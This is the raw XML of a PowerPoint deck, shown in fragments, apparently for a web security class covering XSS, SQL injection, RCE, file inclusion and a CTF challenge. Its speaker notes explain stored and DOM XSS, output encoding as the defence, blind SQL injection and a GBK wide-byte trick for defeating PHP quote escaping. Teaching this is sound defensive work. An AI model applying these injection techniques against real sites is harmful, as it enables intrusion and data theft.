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tags/tag18.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide12.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide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tags/tag20.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide14.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/tags/tag21.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide15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7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8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9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20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1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2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23.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/tags/tag54.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide24.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/tags/tag55.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide25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26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27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8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9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30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31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32.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/tags/tag80.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide33.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/tags/tag81.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide34.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/tags/tag82.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide35.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/tags/tag83.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide36.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/tags/tag84.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide37.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/tags/tag85.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide38.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/tags/tag86.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags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313" r:id="rId2"/>
    <p:sldId id="442" r:id="rId3"/>
    <p:sldId id="473" r:id="rId4"/>
    <p:sldId id="441" r:id="rId5"/>
    <p:sldId id="367" r:id="rId6"/>
    <p:sldId id="440" r:id="rId7"/>
    <p:sldId id="368" r:id="rId8"/>
    <p:sldId id="324" r:id="rId9"/>
    <p:sldId id="325" r:id="rId10"/>
    <p:sldId id="328" r:id="rId11"/>
    <p:sldId id="332" r:id="rId12"/>
    <p:sldId id="334" r:id="rId13"/>
    <p:sldId id="335" r:id="rId14"/>
    <p:sldId id="336" r:id="rId15"/>
    <p:sldId id="343" r:id="rId16"/>
    <p:sldId id="344" r:id="rId17"/>
    <p:sldId id="345" r:id="rId18"/>
    <p:sldId id="346" r:id="rId19"/>
    <p:sldId id="363" r:id="rId20"/>
    <p:sldId id="347" r:id="rId21"/>
    <p:sldId id="348" r:id="rId22"/>
    <p:sldId id="351" r:id="rId23"/>
    <p:sldId id="350" r:id="rId24"/>
    <p:sldId id="342" r:id="rId25"/>
    <p:sldId id="364" r:id="rId26"/>
    <p:sldId id="453" r:id="rId27"/>
    <p:sldId id="469" r:id="rId28"/>
    <p:sldId id="470" r:id="rId29"/>
    <p:sldId id="471" r:id="rId30"/>
    <p:sldId id="458" r:id="rId31"/>
    <p:sldId id="446" r:id="rId32"/>
    <p:sldId id="352" r:id="rId33"/>
    <p:sldId id="444" r:id="rId34"/>
    <p:sldId id="369" r:id="rId35"/>
    <p:sldId id="370" r:id="rId36"/>
    <p:sldId id="372" r:id="rId37"/>
    <p:sldId id="374" r:id="rId38"/>
    <p:sldId id="376" r:id="rId39"/>
    <p:sldId id="377" r:id="rId40"/>
    <p:sldId id="455" r:id="rId41"/>
    <p:sldId id="456" r:id="rId42"/>
    <p:sldId id="403" r:id="rId43"/>
    <p:sldId id="404" r:id="rId44"/>
    <p:sldId id="380" r:id="rId45"/>
    <p:sldId id="381" r:id="rId46"/>
    <p:sldId id="382" r:id="rId47"/>
    <p:sldId id="383" r:id="rId48"/>
    <p:sldId id="384" r:id="rId49"/>
    <p:sldId id="385" r:id="rId50"/>
    <p:sldId id="386" r:id="rId51"/>
    <p:sldId id="387" r:id="rId52"/>
    <p:sldId id="388" r:id="rId53"/>
    <p:sldId id="452" r:id="rId54"/>
    <p:sldId id="389" r:id="rId55"/>
    <p:sldId id="390" r:id="rId56"/>
    <p:sldId id="391" r:id="rId57"/>
    <p:sldId id="392" r:id="rId58"/>
    <p:sldId id="393" r:id="rId59"/>
    <p:sldId id="394" r:id="rId60"/>
    <p:sldId id="396" r:id="rId61"/>
    <p:sldId id="397" r:id="rId62"/>
    <p:sldId id="398" r:id="rId63"/>
    <p:sldId id="399" r:id="rId64"/>
    <p:sldId id="400" r:id="rId65"/>
    <p:sldId id="401" r:id="rId66"/>
    <p:sldId id="472" r:id="rId67"/>
    <p:sldId id="459" r:id="rId68"/>
    <p:sldId id="447" r:id="rId69"/>
    <p:sldId id="402" r:id="rId70"/>
    <p:sldId id="405" r:id="rId71"/>
    <p:sldId id="438" r:id="rId72"/>
    <p:sldId id="445" r:id="rId73"/>
    <p:sldId id="450" r:id="rId74"/>
    <p:sldId id="449" r:id="rId75"/>
    <p:sldId id="457" r:id="rId76"/>
    <p:sldId id="474" r:id="rId77"/>
    <p:sldId id="362" r:id="rId78"/>
    <p:sldId id="460" r:id="rId79"/>
    <p:sldId id="461" r:id="rId80"/>
    <p:sldId id="462" r:id="rId81"/>
    <p:sldId id="463" r:id="rId82"/>
    <p:sldId id="464" r:id="rId83"/>
    <p:sldId id="465" r:id="rId84"/>
    <p:sldId id="466" r:id="rId85"/>
    <p:sldId id="467" r:id="rId86"/>
  </p:sldIdLst>
  <p:sldSz cx="9144000" cy="6858000" type="screen4x3"/>
  <p:notesSz cx="6807200" cy="9939338"/>
  <p:custDataLst>
    <p:tags r:id="rId88"/>
  </p:custData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B63B297-6A30-6B47-90EE-E19990F4D0E7}">
          <p14:sldIdLst>
            <p14:sldId id="313"/>
            <p14:sldId id="442"/>
            <p14:sldId id="473"/>
            <p14:sldId id="441"/>
            <p14:sldId id="367"/>
            <p14:sldId id="440"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="XSS" id="{2BA3379F-C0D6-2440-8A5C-4A99FC38E64F}">
          <p14:sldIdLst>
            <p14:sldId id="368"/>
            <p14:sldId id="324"/>
            <p14:sldId id="325"/>
            <p14:sldId id="328"/>
            <p14:sldId id="332"/>
            <p14:sldId id="334"/>
            <p14:sldId id="335"/>
            <p14:sldId id="336"/>
            <p14:sldId id="343"/>
            <p14:sldId id="344"/>
            <p14:sldId id="345"/>
            <p14:sldId id="346"/>
            <p14:sldId id="363"/>
            <p14:sldId id="347"/>
            <p14:sldId id="348"/>
            <p14:sldId id="351"/>
            <p14:sldId id="350"/>
            <p14:sldId id="342"/>
            <p14:sldId id="364"/>
            <p14:sldId id="453"/>
            <p14:sldId id="469"/>
            <p14:sldId id="470"/>
            <p14:sldId id="471"/>
            <p14:sldId id="458"/>
            <p14:sldId id="446"/>
            <p14:sldId id="352"/>
            <p14:sldId id="444"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="SQLi" id="{DCC63BBB-6744-0447-BD70-6A733D1FE65F}">
          <p14:sldIdLst>
            <p14:sldId id="369"/>
            <p14:sldId id="370"/>
            <p14:sldId id="372"/>
            <p14:sldId id="374"/>
            <p14:sldId id="376"/>
            <p14:sldId id="377"/>
            <p14:sldId id="455"/>
            <p14:sldId id="456"/>
            <p14:sldId id="403"/>
            <p14:sldId id="404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452"/>
            <p14:sldId id="389"/>
            <p14:sldId id="390"/>
            <p14:sldId id="391"/>
            <p14:sldId id="392"/>
            <p14:sldId id="393"/>
            <p14:sldId id="394"/>
            <p14:sldId id="396"/>
            <p14:sldId id="397"/>
            <p14:sldId id="398"/>
            <p14:sldId id="399"/>
            <p14:sldId id="400"/>
            <p14:sldId id="401"/>
            <p14:sldId id="472"/>
            <p14:sldId id="459"/>
            <p14:sldId id="447"/>
            <p14:sldId id="402"/>
            <p14:sldId id="405"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Challenge" id="{B9DB1E8E-12CB-AD4E-A417-C5B2FBE66373}">
          <p14:sldIdLst>
            <p14:sldId id="438"/>
            <p14:sldId id="445"/>
            <p14:sldId id="450"/>
            <p14:sldId id="449"/>
            <p14:sldId id="457"/>
            <p14:sldId id="474"/>
            <p14:sldId id="362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61">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="2" orient="horz" pos="2047">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="3" orient="horz" pos="164">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="4" orient="horz" pos="1706">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="5" orient="horz" pos="504">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="6" orient="horz" pos="3385">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="7" orient="horz" pos="391">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="8" pos="226">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="9" pos="553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sieh, ChiaLung | Albert | ISGD" initials="HC|A|I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4DF8"/>
    <a:srgbClr val="BF0000"/>
    <a:srgbClr val="969696"/>
    <a:srgbClr val="00506E"/>
    <a:srgbClr val="FF0066"/>
    <a:srgbClr val="5F5F5F"/>
    <a:srgbClr val="4D4D4D"/>
    <a:srgbClr val="292929"/>
    <a:srgbClr val="333333"/>
    <a:srgbClr val="8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2297" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr showGuides="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="53" d="100"/>
          <a:sy n="53" d="100"/>
        </p:scale>
        <p:origin x="1800" y="176"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="3861"/>
        <p:guide orient="horz" pos="2047"/>
        <p:guide orient="horz" pos="164"/>
        <p:guide orient="horz" pos="1706"/>
        <p:guide orient="horz" pos="504"/>
        <p:guide orient="horz" pos="3385"/>
        <p:guide orient="horz" pos="391"/>
        <p:guide pos="226"/>
        <p:guide pos="55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94" Type="http://schemas.microsoft.com/office/2015/10/relationships/revisionInfo" Target="revisionInfo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notesMaster" Target="notesMasters/notesMaster1.xml"/><Relationship Id="rId88" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="tags/tag1.xml"/><Relationship Id="rId8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E22AB-730F-4C4B-A6E7-89E97B93078F}" type="datetimeFigureOut">
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" smtClean="0"/>
              <a:t>2018/3/8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38E3F1-FAA5-4043-BB02-BBDB9D30AFA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114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9660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 result will be this. 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141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When</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" baseline="0" dirty="0"/>
              <a:t> user input will be updated to DB and will be shown in the future.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0436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When victim retrieve the data from DB, victim’s browser execute the raw </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" err="1"/>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>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496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8608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6097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DOM</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" baseline="0" dirty="0"/>
              <a:t> based XSS is pretty different.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" baseline="0" dirty="0"/>
              <a:t>DOM is to store a tree structure of HTML for rendering.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20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 general way to defend against XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" baseline="0" dirty="0"/>
              <a:t> is out put encoding.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" baseline="0" dirty="0"/>
              <a:t>With encoding of the special characters, your browser wont be executing the raw script.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97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 general way to defend against XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" baseline="0" dirty="0"/>
              <a:t> is out put encoding.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" baseline="0" dirty="0"/>
              <a:t>With encoding of the special characters, your browser wont be executing the raw script.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5929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993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2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40 minutes XSS and labs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    40 minutes SQL injection and labs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    Break if needed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    40 minutes RCE and labs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    40 minutes Remote/Local File Inclusion and labs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    30 minutes CTF Challenge</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    20 minutes Solution Sharing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    (Time format per topic would be 10 minute explanation + 30 minute lab time.)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96968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asks the database true or false questions and determines the answer based on the applications response.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543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22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5C : single quote</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>27: slash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1738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Has these </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" err="1"/>
              <a:t>func</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t> to add slash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10646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Check by byte, nothing to BF,</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" baseline="0" dirty="0"/>
              <a:t> but add 5C to 27</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" baseline="0" dirty="0" err="1"/>
              <a:t>Php</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" baseline="0" dirty="0" err="1"/>
              <a:t>funcs</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" baseline="0" dirty="0"/>
              <a:t> to add slash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" baseline="0" dirty="0"/>
              <a:t>PHP parse for GBK in </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" baseline="0" dirty="0" err="1"/>
              <a:t>differentway</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP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34697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Check by byte, nothing to BF,</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" baseline="0" dirty="0"/>
              <a:t> but add 5C to 27</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" baseline="0" dirty="0" err="1"/>
              <a:t>Php</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" baseline="0" dirty="0" err="1"/>
              <a:t>funcs</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" baseline="0" dirty="0"/>
              <a:t> to add slash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" baseline="0" dirty="0"/>
              <a:t>PHP parse for GBK in </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" baseline="0" dirty="0" err="1"/>
              <a:t>differentway</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP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2183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Need </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" err="1"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t> encoding with %</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>When adding, into input, % will be encode as 25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81647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Try &amp; error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69602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/* for commenting out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62510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 general way to defend against XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" baseline="0" dirty="0"/>
              <a:t> is out put encoding.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" baseline="0" dirty="0"/>
              <a:t>With encoding of the special characters, your browser wont be executing the raw script.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9034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73136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55081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84657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 general way to defend against XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" baseline="0" dirty="0"/>
              <a:t> is out put encoding.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" baseline="0" dirty="0"/>
              <a:t>With encoding of the special characters, your browser wont be executing the raw script.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80621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 general way to defend against XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" baseline="0" dirty="0"/>
              <a:t> is out put encoding.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" baseline="0" dirty="0"/>
              <a:t>With encoding of the special characters, your browser wont be executing the raw script.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79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94193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 general way to defend against XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" baseline="0" dirty="0"/>
              <a:t> is out put encoding.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" baseline="0" dirty="0"/>
              <a:t>With encoding of the special characters, your browser wont be executing the raw script.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79731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 general way to defend against XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" baseline="0" dirty="0"/>
              <a:t> is out put encoding.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" baseline="0" dirty="0"/>
              <a:t>With encoding of the special characters, your browser wont be executing the raw script.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26340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 general way to defend against XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" baseline="0" dirty="0"/>
              <a:t> is out put encoding.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" baseline="0" dirty="0"/>
              <a:t>With encoding of the special characters, your browser wont be executing the raw script.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05615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 general way to defend against XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" baseline="0" dirty="0"/>
              <a:t> is out put encoding.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" baseline="0" dirty="0"/>
              <a:t>With encoding of the special characters, your browser wont be executing the raw script.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8696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 general way to defend against XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" baseline="0" dirty="0"/>
              <a:t> is out put encoding.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" baseline="0" dirty="0"/>
              <a:t>With encoding of the special characters, your browser wont be executing the raw script.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85892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 general way to defend against XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" baseline="0" dirty="0"/>
              <a:t> is out put encoding.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" baseline="0" dirty="0"/>
              <a:t>With encoding of the special characters, your browser wont be executing the raw script.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9193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Most of the time a security engineer will show you this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863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 ability for hackers</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" baseline="0" dirty="0"/>
              <a:t> to execute scripts in your browser by abusing an vulnerable web application.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" baseline="0" dirty="0"/>
              <a:t>Client side scripting, or browser injection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9586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4853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Let’s assume there is a</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" baseline="0" dirty="0"/>
              <a:t> web app that will greet you by the name you input.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" baseline="0" dirty="0"/>
              <a:t>When you input your name as </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" baseline="0" dirty="0" err="1"/>
              <a:t>chris</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" baseline="0" dirty="0"/>
              <a:t>, the app will say “Hi, Chris” in the response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5012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Now</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" baseline="0" dirty="0"/>
              <a:t> think about it, what if my name includes some </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" baseline="0" dirty="0" err="1"/>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" baseline="0" dirty="0"/>
              <a:t>?</a:t>
            </a:r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4917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If the target web app is vulnerable</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" baseline="0" dirty="0"/>
              <a:t> to XSS, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" baseline="0" dirty="0"/>
              <a:t>When you input your name with </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" baseline="0" dirty="0" err="1"/>
              <a:t>javascripts</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" baseline="0" dirty="0"/>
              <a:t>, the web app will greet you with exactly what you input.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38E3F1-FAA5-4043-BB02-BBDB9D30AFA5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1107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ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="360000" y="540000"/>
            <a:ext cx="8424000" cy="2160000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="4000" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="50" charset="-128"/>
              </a:defRPr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/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="360000" y="3204000"/>
            <a:ext cx="8424000" cy="2160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400" b="1" baseline="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3377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360000" y="252000"/>
            <a:ext cx="8424000" cy="360000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr" anchorCtr="1">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="2800" b="1" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="50" charset="-128"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>スライド見出し</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="スライド番号プレースホルダ 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8600504" y="6387135"/>
            <a:ext cx="255198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A4208183-D1D2-4F7E-8D00-ABEF26284ACB}" type="slidenum">
              <a:rPr lang="en-US" altLang="ja-JP" sz="1000" b="1">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr algn="r">
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="10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305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7" y="6371951"/>
            <a:ext cx="1498325" cy="24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9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png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.tiff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png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.tiff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png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.tiff"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image9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4.tiff"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6.tiff"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.tiff"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.pn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4.tiff"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6.tiff"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.tiff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5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.tiff"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.pn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4.tiff"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6.tiff"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.tiff"/><Relationship Id="rId8" 